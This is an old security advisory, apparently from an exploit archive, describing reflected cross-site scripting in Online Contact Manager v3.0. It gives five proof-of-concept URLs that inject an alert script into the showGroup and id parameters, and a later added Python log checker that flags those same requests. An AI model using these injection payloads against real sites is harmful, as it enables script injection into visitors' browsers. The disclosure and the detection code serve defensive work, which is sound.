Online Contact Manager version 3.0 suffers from multiple cross-site scripting vulnerabilities.
=========================================================================================
Title : Multiple Cross-site Scripting (XSS) Vulnerabilities
Software : Online Contact Manager v3.0
Vendor : www.esoftpro.com
Date : 19 April 2009
Author : Vrs-hCk
Contact : d00r@telkom.net
Blog : c0li.BlogSpot.Com
=========================================================================================
[-] Vulnerable
index.php
view.php
email.php
edit.php
delete.php
[-] Exploit
http://[site]/[path]/index.php?showGroup=+<script>alert(123)</script>
http://[site]/[path]/view.php?id=+<script>alert(123)</script>
http://[site]/[path]/email.php?id=+<script>alert(123)</script>
http://[site]/[path]/edit.php?id=+<script>alert(123)</script>
http://[site]/[path]/delete.php?id=+<script>alert(123)</script>
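
A log check for the request patterns listed above, added here as an example (it is not part of the original advisory or the vendor's code). It assumes Apache-style access log lines and that `id` is normally a plain integer; the `/ocm/` path and the sample log lines are constructed.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Scripts and the reflected parameter named for each in the advisory.
WATCHED = {"index.php": "showGroup", "view.php": "id", "email.php": "id",
           "edit.php": "id", "delete.php": "id"}
# Request line of a common/combined log format entry (assumed log layout).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
MARKUP_RE = re.compile(r"[<>\"']")  # characters that need HTML encoding


def suspicious_params(log_line):
    """Return [(script, param, decoded_value)] for watched parameters that look unsafe."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    script = url.path.rsplit("/", 1)[-1]
    param = WATCHED.get(script)
    if param is None:
        return []
    hits = []
    # parse_qs percent-decodes values and turns '+' into a space.
    for value in parse_qs(url.query, keep_blank_values=True).get(param, []):
        value = value.strip()
        if param == "id":
            # Assumption: record ids are plain ASCII integers.
            bad = re.fullmatch(r"[0-9]+", value) is None
        else:
            bad = MARKUP_RE.search(value) is not None
        if bad:
            hits.append((script, param, value))
    return hits


# Constructed sample lines (not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [20/Apr/2009:10:00:01 +0000] "GET /ocm/view.php?id=17 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [20/Apr/2009:10:00:07 +0000] "GET /ocm/view.php?id=+%3Cscript%3Ealert(123)%3C/script%3E HTTP/1.1" 200 5301',
    '192.0.2.44 - - [20/Apr/2009:10:00:09 +0000] "GET /ocm/index.php?showGroup=+<script>alert(123)</script> HTTP/1.1" 200 8120',
    '192.0.2.10 - - [20/Apr/2009:10:00:12 +0000] "GET /ocm/index.php?showGroup=Friends HTTP/1.1" 200 8011',
]

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        for hit in suspicious_params(line):
            print(hit)
```

The same two rules (integer-only `id`, no markup characters in `showGroup`) describe the server-side input validation that, together with HTML-encoding on output, would close these reflections.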
=========================================================================================
[-] Greetz :
Paman, NoGe, OoN_Boy, Angela Chang, pizzyroot, zxvf, ajegille, em|nem, loqsa, Fluzy,
bl4Ck_3n91n3, H312Y, S3T4N, Janroe, and a special muaacchh for the One I Love (*_^)
c0li.m0de.0n and Behave oR BeGone !!!
=========================================================================================